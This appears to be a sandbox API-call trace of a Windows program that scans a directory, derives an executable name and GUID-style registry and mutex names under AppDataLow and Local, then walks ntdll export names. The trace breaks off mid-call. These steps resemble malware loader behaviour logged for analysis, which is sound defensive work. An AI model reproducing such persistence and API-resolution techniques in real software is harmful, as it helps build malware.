1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.922] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.922] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.923] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.923] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.924] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.924] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.924] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.924] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.924] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.924] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.924] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.924] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.924] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.924] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.924] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.924] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.924] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.924] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.924] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.924] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.924] FindNextFileA (in: hFindFile=0x61e908, lpFindFileData=0x5dfd58 | out: lpFindFileData=0x5dfd58) returned 1 [0075.924] CompareFileTime (lpFileTime1=0x5dfd6c, lpFileTime2=0x5dfeac) returned -1 [0075.924] StrChrA (lpStart="ddraw.dll", wMatch=0x2e) returned=".dll" [0075.925] lstrlenA (lpString="adsldraw") returned 8 [0075.925] mbstowcs (in: _Dest=0x2228750, _Source="adsldraw", _MaxCount=0xe | out: _Dest="adsldraw") returned 0x8 [0075.925] lstrcatW (in: lpString1="autoclb", lpString2=".exe" | out: lpString1="autoclb.exe") returned="autoclb.exe" [0075.925] wsprintfA (in: param_1=0x2228778, param_2="%08X-%04X-%04X-%04X-%08X%04X" | out: param_1="667F6611-8D0F-88EB-47FA-113C6BCED530") returned 36 [0075.925] lstrlenA (lpString="Software\\AppDataLow\\Software\\Microsoft\\") returned 39 [0075.925] lstrcpyA (in: lpString1=0x2228a58, lpString2="Software\\AppDataLow\\Software\\Microsoft\\" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\") returned="Software\\AppDataLow\\Software\\Microsoft\\" [0075.925] lstrcatA (in: lpString1="Software\\AppDataLow\\Software\\Microsoft\\", lpString2="667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0075.926] wsprintfA (in: param_1=0x2228778, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned 38 [0075.926] lstrlenA (lpString="Local\\") returned 6 [0075.926] lstrcpyA (in: lpString1=0x2228ab0, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0075.926] lstrcatA (in: lpString1="Local\\", lpString2="{2F87B751-C28A-394B-44D3-167DB8B7AA01}" | out: lpString1="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}" [0075.926] wsprintfA (in: param_1=0x2228778, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}") returned 38 [0075.926] lstrcatA (in: lpString1="", lpString2="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}" | out: lpString1="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}") returned="{6C433A47-DB67-7E7B-C560-3F92C994E3E6}" [0075.926] wsprintfA (in: param_1=0x2228778, param_2="{%08X-%04X-%04X-%04X-%08X%04X}" | out: param_1="{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned 38 [0075.926] lstrlenA (lpString="Local\\") returned 6 [0075.926] lstrcpyA (in: lpString1=0x2228b18, lpString2="Local\\" | out: lpString1="Local\\") returned="Local\\" [0075.926] lstrcatA (in: lpString1="Local\\", lpString2="{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}" | out: lpString1="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}") returned="Local\\{0D65F8EA-0843-C78A-7A91-BCEB4E55B04F}" [0075.926] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77ca0000 [0075.926] lstrlenA (lpString="A_SHAFinal") returned 10 [0075.926] lstrlenA (lpString="A_SHAInit") returned 9 [0075.926] lstrlenA (lpString="A_SHAUpdate") returned 11 [0075.926] lstrlenA (lpString="AlpcAdjustCompletionListConcurrencyCount") returned 40 [0075.926] lstrlenA (lpString="AlpcFreeCompletionListMessage") returned 29 [0075.926] lstrlenA (lpString="AlpcGetCompletionListLastMessageInformation") returned 43 [0075.926] lstrlenA (lpString="AlpcGetCompletionListMessageAttributes") returned 38 [0075.926] lstrlenA (lpString="AlpcGetHeaderSize") returned 17 [0075.926] lstrlenA (lpString="AlpcGetMessageAttribute") returned 23 [0075.926] lstrlenA (lpString="AlpcGetMessageFromCompletionList") returned 32 [0075.926] lstrlenA (lpString="AlpcGetOutstandingCompletionListMessageCount") returned 44 [0075.926] lstrlenA (lpString="AlpcInitializeMessageAttribute") returned 30 [0075.926] lstrlenA (lpString="AlpcMaxAllowedMessageLength") returned 27 [0075.926] lstrlenA (lpString="AlpcRegisterCompletionList") returned 26 [0075.926] lstrlenA (lpString="AlpcRegisterCompletionListWorkerThread") returned 38 [0075.926] lstrlenA (lpString="AlpcRundownCompletionList") returned 25 [0075.926] lstrlenA (lpString="AlpcUnregisterCompletionList") returned 28 [0075.927] lstrlenA (lpString="AlpcUnregisterCompletionListWorkerThread") returned 40 [0075.927] lstrlenA (lpString="ApiSetQueryApiSetPresence") returned 25 [0075.927] lstrlenA (lpString="CsrAllocateCaptureBuffer") returned 24 [0075.927] lstrlenA (lpString="CsrAllocateMessagePointer") returned 25 [0075.927] lstrlenA (lpString="CsrCaptureMessageBuffer") returned 23 [0075.927] lstrlenA (lpString="CsrCaptureMessageMultiUnicodeStringsInPlace") returned 43 [0075.927] lstrlenA (lpString="CsrCaptureMessageString") returned 23 [0075.927] lstrlenA (lpString="CsrCaptureTimeout") returned 17 [0075.927] lstrlenA (lpString="CsrClientCallServer") returned 19 [0075.927] lstrlenA (lpString="CsrClientConnectToServer") returned 24 [0075.927] lstrlenA (lpString="CsrFreeCaptureBuffer") returned 20 [0075.927] lstrlenA (lpString="CsrGetProcessId") returned 15 [0075.927] lstrlenA (lpString="CsrIdentifyAlertableThread") returned 26 [0075.927] lstrlenA (lpString="CsrSetPriorityClass") returned 19 [0075.927] lstrlenA (lpString="CsrVerifyRegion") returned 15 [0075.927] lstrlenA (lpString="DbgBreakPoint") returned 13 [0075.927] lstrlenA (lpString="DbgPrint") returned 8 [0075.927] lstrlenA (lpString="DbgPrintEx") returned 10 [0075.927] lstrlenA (lpString="DbgPrintReturnControlC") returned 22 [0075.927] lstrlenA (lpString="DbgPrompt") returned 9 [0075.927] lstrlenA (lpString="DbgQueryDebugFilterState") returned 24 [0075.927] lstrlenA (lpString="DbgSetDebugFilterState") returned 22 [0075.927] lstrlenA (lpString="DbgUiConnectToDbg") returned 17 [0075.927] lstrlenA (lpString="DbgUiContinue") returned 13 [0075.927] lstrlenA (lpString="DbgUiConvertStateChangeStructure") returned 32 [0075.927] lstrlenA (lpString="DbgUiConvertStateChangeStructureEx") returned 34 [0075.927] lstrlenA (lpString="DbgUiDebugActiveProcess") returned 23 [0075.927] lstrlenA (lpString="DbgUiGetThreadDebugObject") returned 25 [0075.927] lstrlenA (lpString="DbgUiIssueRemoteBreakin") returned 23 [0075.927] lstrlenA (lpString="DbgUiRemoteBreakin") returned 18 [0075.927] lstrlenA (lpString="DbgUiSetThreadDebugObject") returned 25 [0075.927] lstrlenA (lpString="DbgUiStopDebugging") returned 18 [0075.927] lstrlenA (lpString="DbgUiWaitStateChange") returned 20 [0075.927] lstrlenA (lpString="DbgUserBreakPoint") returned 17 [0075.927] lstrlenA (lpString="EtwCreateTraceInstanceId") returned 24 [0075.927] lstrlenA (lpString="EtwDeliverDataBlock") returned 19 [0075.927] lstrlenA (lpString="EtwEnumerateProcessRegGuids") returned 27 [0075.927] lstrlenA (lpString="EtwEventActivityIdControl") returned 25 [0075.927] lstrlenA (lpString="EtwEventEnabled") returned 15 [0075.927] lstrlenA (lpString="EtwEventProviderEnabled") returned 23 [0075.928] lstrlenA (lpString="EtwEventRegister") returned 16 [0075.928] lstrlenA (lpString="EtwEventSetInformation") returned 22 [0075.928] lstrlenA (lpString="EtwEventUnregister") returned 18 [0075.928] lstrlenA (lpString="EtwEventWrite") returned 13 [0075.928] lstrlenA (lpString="EtwEventWriteEndScenario") returned 24 [0075.928] lstrlenA (lpString="EtwEventWriteEx") returned 15 [0075.928] lstrlenA (lpString="EtwEventWriteFull") returned 17 [0075.928] lstrlenA (lpString="EtwEventWriteNoRegistration") returned 27 [0075.928] lstrlenA (lpString="EtwEventWriteStartScenario") returned 26 [0075.928] lstrlenA (lpString="EtwEventWriteString") returned 19 [0075.928] lstrlenA (lpString="EtwEventWriteTransfer") returned 21 [0075.928] lstrlenA (lpString="EtwGetTraceEnableFlags") returned 22 [0075.928] lstrlenA (lpString="EtwGetTraceEnableLevel") returned 22 [0075.928] lstrlenA (lpString="EtwGetTraceLoggerHandle") returned 23 [0075.928] lstrlenA (lpString="EtwLogTraceEvent") returned 16 [0075.928] lstrlenA (lpString="EtwNotificationRegister") returned 23 [0075.928] lstrlenA (lpString="EtwNotificationUnregister") returned 25 [0075.928] lstrlenA (lpString="EtwProcessPrivateLoggerRequest") returned 30 [0075.928] lstrlenA (lpString="EtwRegisterSecurityProvider") returned 27 [0075.928] lstrlenA (lpString="EtwRegisterTraceGuidsA") returned 22 [0075.928] lstrlenA (lpString="EtwRegisterTraceGuidsW") returned 22 [0075.928] lstrlenA (lpString="EtwReplyNotification") returned 20 [0075.928] lstrlenA (lpString="EtwSendNotification") returned 19 [0075.928] lstrlenA (lpString="EtwSetMark") returned 10 [0075.928] lstrlenA (lpString="EtwTraceEventInstance") returned 21 [0075.928] lstrlenA (lpString="EtwTraceMessage") returned 15 [0075.928] lstrlenA (lpString="EtwTraceMessageVa") returned 17 [0075.928] lstrlenA (lpString="EtwUnregisterTraceGuids") returned 23 [0075.928] lstrlenA (lpString="EtwWriteUMSecurityEvent") returned 23 [0075.928] lstrlenA (lpString="EtwpCreateEtwThread") returned 19 [0075.928] lstrlenA (lpString="EtwpGetCpuSpeed") returned 15 [0075.928] lstrlenA (lpString="EvtIntReportAuthzEventAndSourceAsync") returned 36 [0075.928] lstrlenA (lpString="EvtIntReportEventAndSourceAsync") returned 31 [0075.928] lstrlenA (lpString="ExpInterlockedPopEntrySListEnd") returned 30 [0075.928] lstrlenA (lpString="ExpInterlockedPopEntrySListFault") returned 32 [0075.928] lstrlenA (lpString="ExpInterlockedPopEntrySListResume") returned 33 [0075.928] lstrlenA (lpString="KiFastSystemCall") returned 16 [0075.928] lstrlenA (lpString="KiFastSystemCallRet") returned 19 [0075.928] lstrlenA (lpString="KiIntSystemCall") returned 15 [0075.928] lstrlenA (lpString="KiRaiseUserExceptionDispatcher") returned 30 [0075.929] lstrlenA (lpString="KiUserApcDispatcher") returned 19 [0075.929] lstrlenA (lpString="KiUserCallbackDispatcher") returned 24 [0075.929] lstrlenA (lpString="KiUserExceptionDispatcher") returned 25 [0075.929] lstrlenA (lpString="LdrAccessResource") returned 17 [0075.929] lstrlenA (lpString="LdrAddDllDirectory") returned 18 [0075.929] lstrlenA (lpString="LdrAddLoadAsDataTable") returned 21 [0075.929] lstrlenA (lpString="LdrAddRefDll") returned 12 [0075.929] lstrlenA (lpString="LdrAppxHandleIntegrityFailure") returned 29 [0075.929] lstrlenA (lpString="LdrDisableThreadCalloutsForDll") returned 30 [0075.929] lstrlenA (lpString="LdrEnumResources") returned 16 [0075.929] lstrlenA (lpString="LdrEnumerateLoadedModules") returned 25 [0075.929] lstrlenA (lpString="LdrFastFailInLoaderCallout") returned 26 [0075.929] lstrlenA (lpString="LdrFindEntryForAddress") returned 22 [0075.929] lstrlenA (lpString="LdrFindResourceDirectory_U") returned 26 [0075.929] lstrlenA (lpString="LdrFindResourceEx_U") returned 19 [0075.929] lstrlenA (lpString="LdrFindResource_U") returned 17 [0075.929] lstrlenA (lpString="LdrFlushAlternateResourceModules") returned 32 [0075.929] lstrlenA (lpString="LdrGetDllDirectory") returned 18 [0075.929] lstrlenA (lpString="LdrGetDllFullName") returned 17 [0075.929] lstrlenA (lpString="LdrGetDllHandle") returned 15 [0075.929] lstrlenA (lpString="LdrGetDllHandleByMapping") returned 24 [0075.929] lstrlenA (lpString="LdrGetDllHandleByName") returned 21 [0075.929] lstrlenA (lpString="LdrGetDllHandleEx") returned 17 [0075.929] lstrlenA (lpString="LdrGetDllPath") returned 13 [0075.929] lstrlenA (lpString="LdrGetFailureData") returned 17 [0075.929] lstrlenA (lpString="LdrGetFileNameFromLoadAsDataTable") returned 33 [0075.929] lstrlenA (lpString="LdrGetProcedureAddress") returned 22 [0075.929] lstrlenA (lpString="LdrGetProcedureAddressEx") returned 24 [0075.929] lstrlenA (lpString="LdrGetProcedureAddressForCaller") returned 31 [0075.929] lstrlenA (lpString="LdrInitShimEngineDynamic") returned 24 [0075.929] lstrlenA (lpString="LdrInitializeThunk") returned 18 [0075.929] lstrlenA (lpString="LdrLoadAlternateResourceModule") returned 30 [0075.929] lstrlenA (lpString="LdrLoadAlternateResourceModuleEx") returned 32 [0075.929] lstrlenA (lpString="LdrLoadDll") returned 10 [0075.929] lstrlenA (lpString="LdrLockLoaderLock") returned 17 [0075.929] lstrlenA (lpString="LdrOpenImageFileOptionsKey") returned 26 [0075.929] lstrlenA (lpString="LdrProcessRelocationBlock") returned 25 [0075.929] lstrlenA (lpString="LdrProcessRelocationBlockEx") returned 27 [0075.929] lstrlenA (lpString="LdrQueryImageFileExecutionOptions") returned 33 [0075.929] lstrlenA (lpString="LdrQueryImageFileExecutionOptionsEx") returned 35 [0075.929] lstrlenA (lpString="LdrQueryImageFileKeyOption") returned 26 [0075.930] lstrlenA (lpString="LdrQueryModuleServiceTags") returned 25 [0075.930] lstrlenA (lpString="LdrQueryOptionalDelayLoadedAPI") returned 30 [0075.930] lstrlenA (lpString="LdrQueryProcessModuleInformation") returned 32 [0075.930] lstrlenA (lpString="LdrRegisterDllNotification") returned 26 [0075.930] lstrlenA (lpString="LdrRemoveDllDirectory") returned 21 [0075.930] lstrlenA (lpString="LdrRemoveLoadAsDataTable") returned 24 [0075.930] lstrlenA (lpString="LdrResFindResource") returned 18 [0075.930] lstrlenA (lpString="LdrResFindResourceDirectory") returned 27 [0075.930] lstrlenA (lpString="LdrResGetRCConfig") returned 17 [0075.930] lstrlenA (lpString="LdrResRelease") returned 13 [0075.930] lstrlenA (lpString="LdrResSearchResource") returned 20 [0075.930] lstrlenA (lpString="LdrResolveDelayLoadedAPI") returned 24 [0075.930] lstrlenA (lpString="LdrResolveDelayLoadsFromDll") returned 27 [0075.930] lstrlenA (lpString="LdrRscIsTypeExist") returned 17 [0075.930] lstrlenA (lpString="LdrSetAppCompatDllRedirectionCallback") returned 37 [0075.930] lstrlenA (lpString="LdrSetDefaultDllDirectories") returned 27 [0075.930] lstrlenA (lpString="LdrSetDllDirectory") returned 18 [0075.930] lstrlenA (lpString="LdrSetDllManifestProber") returned 23 [0075.930] lstrlenA (lpString="LdrSetImplicitPathOptions") returned 25 [0075.930] lstrlenA (lpString="LdrSetMUICacheType") returned 18 [0075.930] lstrlenA (lpString="LdrShutdownProcess") returned 18 [0075.930] lstrlenA (lpString="LdrShutdownThread") returned 17 [0075.930] lstrlenA (lpString="LdrStandardizeSystemPath") returned 24 [0075.930] lstrlenA (lpString="LdrSystemDllInitBlock") returned 21 [0075.930] lstrlenA (lpString="LdrUnloadAlternateResourceModule") returned 32 [0075.930] lstrlenA (lpString="LdrUnloadAlternateResourceModuleEx") returned 34 [0075.930] lstrlenA (lpString="LdrUnloadDll") returned 12 [0075.930] lstrlenA (lpString="LdrUnlockLoaderLock") returned 19 [0075.930] lstrlenA (lpString="LdrUnregisterDllNotification") returned 28 [0075.930] lstrlenA (lpString="LdrVerifyImageMatchesChecksum") returned 29 [0075.930] lstrlenA (lpString="LdrVerifyImageMatchesChecksumEx") returned 31 [0075.930] lstrlenA (lpString="LdrWx86FormatVirtualImage") returned 25 [0075.930] lstrlenA (lpString="LdrpResGetMappingSize") returned 21 [0075.930] lstrlenA (lpString="LdrpResGetResourceDirectory") returned 27 [0075.930] lstrlenA (lpString="MD4Final") returned 8 [0075.930] lstrlenA (lpString="MD4Init") returned 7 [0075.930] lstrlenA (lpString="MD4Update") returned 9 [0075.930] lstrlenA (lpString="MD5Final") returned 8 [0075.930] lstrlenA (lpString="MD5Init") returned 7 [0075.930] lstrlenA (lpString="MD5Update") returned 9 [0075.930] lstrlenA (lpString="NlsAnsiCodePage") returned 15 [0075.931] lstrlenA (lpString="NlsMbCodePageTag") returned 16 [0075.931] lstrlenA (lpString="NlsMbOemCodePageTag") returned 19 [0075.931] lstrlenA (lpString="NtAcceptConnectPort") returned 19 [0075.931] lstrlenA (lpString="NtAccessCheck") returned 13 [0075.931] lstrlenA (lpString="NtAccessCheckAndAuditAlarm") returned 26 [0075.931] lstrlenA (lpString="NtAccessCheckByType") returned 19 [0075.931] lstrlenA (lpString="NtAccessCheckByTypeAndAuditAlarm") returned 32 [0075.931] lstrlenA (lpString="NtAccessCheckByTypeResultList") returned 29 [0075.931] lstrlenA (lpString="NtAccessCheckByTypeResultListAndAuditAlarm") returned 42 [0075.931] lstrlenA (lpString="NtAccessCheckByTypeResultListAndAuditAlarmByHandle") returned 50 [0075.931] lstrlenA (lpString="NtAddAtom") returned 9 [0075.931] lstrlenA (lpString="NtAddAtomEx") returned 11 [0075.931] lstrlenA (lpString="NtAddBootEntry") returned 14 [0075.931] lstrlenA (lpString="NtAddDriverEntry") returned 16 [0075.931] lstrlenA (lpString="NtAdjustGroupsToken") returned 19 [0075.931] lstrlenA (lpString="NtAdjustPrivilegesToken") returned 23 [0075.931] lstrlenA (lpString="NtAdjustTokenClaimsAndDeviceGroups") returned 34 [0075.931] lstrlenA (lpString="NtAlertResumeThread") returned 19 [0075.931] lstrlenA (lpString="NtAlertThread") returned 13 [0075.931] lstrlenA (lpString="NtAlertThreadByThreadId") returned 23 [0075.931] lstrlenA 